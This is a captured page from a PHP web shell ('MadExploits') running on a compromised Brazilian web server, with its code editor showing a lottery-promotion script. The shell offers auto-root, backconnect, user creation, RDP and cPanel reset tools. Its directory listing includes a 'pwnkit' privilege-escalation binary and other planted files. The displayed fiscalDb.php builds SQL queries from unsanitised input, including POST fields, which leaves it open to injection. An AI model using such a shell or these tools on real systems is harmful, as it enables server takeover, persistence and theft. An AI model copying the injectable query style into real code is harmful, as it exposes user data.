Linux vps-4302913.novaexata.com.br 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Apache
: 162.214.88.42 | : 216.73.216.99
166 Domain
7.3.33
wwnova
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
wwnova /
globalscript2020 /
DEFAULT /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
DELETARexec.php
5.19
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
cadastroConsumidor.php
12.73
KB
-rw-r--r--
cadastroConsumidorDB.php
6.39
KB
-rw-r--r--
fiscal.php
10.68
KB
-rw-r--r--
fiscalDb.php
4.87
KB
-rw-r--r--
index.html
14
B
-rw-r--r--
listarNumerosDaSorte.php
2.61
KB
-rw-r--r--
participar.php
4.23
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
rasgadinha.php
5.8
KB
-rw-r--r--
rasgadinhaDb.php
2.44
KB
-rw-r--r--
rasgadinhaListar.php
395
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : fiscalDb.php
<?php /* cadastro de cupom/nota fiscal $erro causa 1 loja não participa da promoção 2 cnpj+ecf+coo+data+valor já cadastrado 3 valor da compra não gera número da sorte 10 cpf do consumidor inválido 11 cnpj do consumidor inválido 12 cupom não disponibilizado ou com erro na digitação */ $status=(-1); if($$validadoservidor=="s"){ goto PERFECT; } if (!VALIDANOSERVIDOR){ //validação final de cpf/cnpj DO CONSUMIDOR $docOK=false; if ($tipodoc !="IDENTIDADE"){ //não tem como validar identidade if ($tipodoc == "CPF"){ $docOK= $util->validacaoDeCPF2019($cpf); if ($docOK==false){ $status=10; //cpf invalido goto erro; } } if ($tipodoc =="CNPJ"){ $docOK= $util->validaCNPJ2019($cnpj); if ($docOK==false){ //cnpj inválido $status=11; goto erro; } } } else { $docOK=true; } if (REQUER_CNPJ) { //então verificar se a loja X participa da promoção $s="select id,cnpj,nomefantasia from lojistas a where cnpj='$cnpj' and (select idloja from lojaporevento where idloja=a.id and idevento='". PROMOCAOID."')"; $s=db()->query($s); if(mysqli_num_rows($s)==0) { $status=1;//loja não participa da promoção goto erro; } else { //pega id da loja para salvar em cupons_x.lojista $s=mysqli_fetch_object($s); $lojistaid =$s->id; } } //se REQUER_CNPJ == false if (!REQUER_CNPJ) { //implementar para pegar e utilizar o cnpj da loja única $cnpj=""; } } else { //SE NÃO VALIDAR NO SERVIDOR $s="select id from lojistas where cnpj='$cnpj'"; $s=db()->query($s); if (mysqli_num_rows($s) ==0 ){ $status='1'; // loja não participa da promoção goto erro; } else { $s=mysqli_fetch_object($s); $lojistaid = $s->id; } //validar cnpj? Não, pq já está na tabela IMP com nr válido ou vazio. //mas precisa para montar a query $qrycnpj=""; if (REQUER_CNPJ) { $qrycnpj= " cnpj='$cnpj' "; } } PERFECT: $s="select * from $tblcupons where cnpj='$cnpj' and datacompra='$dtcompra' and cupomfiscal='$cupomfiscal' and ecfpdv='$ecf' and valordacompra='$valor' "; $s=db()->query($s); if(mysqli_num_rows($s)!=0){ $status=2; goto erro; } //valor da compra gera pelo menos 1 nr da sorte? if ($valor < VALOR_DO_TICKET ){ $status=3; goto erro; } //1 verificar quantos nrsorte pode obter $numerosDaSortePelaCompra = intval( $valor / VALOR_DO_TICKET) ; //2 verificar que a qtde nrsorte não ultrapasse ao MAXIMO_SORTE_POR_COMPRA // somente se MAXIMO_SORTE_POR_COMPRA for maior que ZERO // e FATORACAO for MULTI, senão obtem apenas UM nrsorte // Aqui têm-se o máximo de nrssorte a oferecer. if (MAXIMO_SORTE_POR_COMPRA>0){ if (FATORACAO =="MULTI"){ if($numerosDaSortePelaCompra > MAXIMO_SORTE_POR_COMPRA){ $numerosDaSortePelaCompra = MAXIMO_SORTE_POR_COMPRA; } } else { $numerosDaSortePelaCompra =1; } } //3 verificar quantos nrsorte estão registrados $s="select coalesce(count(id),0) as resp from $tblcupons where cpf='$cpf'"; $s=db()->query($s); $s=mysqli_fetch_object($s); $numeroDeCuponsRegistrados = $s->resp; //4 verificar se é clube para ganhar adicionais $vip=""; $s="select * from consumidores where cpf='$cpf'"; $s=db()->query($s); $s=mysqli_fetch_object($s); if($s->clube!=""){ //nega conteudo vazio, porque clube pode ter "S" OU NR DO CARTÃO CLUBE if (VIP == 'DUPLICAR'){ $numerosDaSortePelaCompra= $numerosDaSortePelaCompra * 2; } if (VIP == 'MAISUM') { $numerosDaSortePelaCompra = $numerosDaSortePelaCompra +1; } //VIP->MAISUM - adiciona um nr da sorte em cada operação de cadastro de cupons //VIP->DUPLICAR - duplica a quantidade de nrs da sorte em cada operação (se não exceder - ao MAX_CUPOM_POR_CPF) //VIP->UMNOCADASTRO - um nrs da sorte, quando realizar o cadastro $vip = VIP . " DE CF:$cupomfiscal ECF:$ecf DT:$dtcompra VLR:$valor"; } //5 se nrsorte a registrar > MAX_SORTE_POR_CPF, reduzir $teste1 = intval($numeroDeCuponsRegistrados) + intval($numerosDaSortePelaCompra); if ( $teste1 > MAX_SORTE_POR_CPF){ $numerosDaSortePelaCompra = $teste1 - MAX_SORTE_POR_CPF; } //6 verifica se tem perguntas na promoção if ($promo['p1sn'] =="S") {$resposta1 = $_POST['pergs1'];} else {$resposta1=0;} if ($promo['p2sn'] =="S") {$resposta2 = $_POST['pergs2'];} else {$resposta2=0;} $s ="update $tblcupons set cpf='$cpf', p1resposta='$resposta1', p2resposta='$resposta2', "; $s.="ip='$ip',dataregistro='$hoje',hora='$hora',cnpj='$cnpj',cupomfiscal='$cupomfiscal', "; $s.="ecfpdv='$ecf',datacompra='$dtcompra',valordacompra='$valor', lojista='$lojistaid', "; $s.="clube='$vip' where cpf='' limit $numerosDaSortePelaCompra "; //echo "<br>$s"; if (db()->query($s)){ $status=0; /* IF (VALIDANOSERVIDOR){ db('CLIENTE', array(EXATAHOST, EXATAUSER, EXATAPASS, EXATADATA. "imp")); $s="update $tblcupons set cpf='$cpf',clube='$vip' where cnpj='$cnpj' and cupomfiscal='$cupomfiscal' and ecfpdv='$ecf' and datacompra='$dtcompra' and valordacompra='$valor'"; $s=db("CLIENTE")->query($s); } */ } erro: ?>
Close
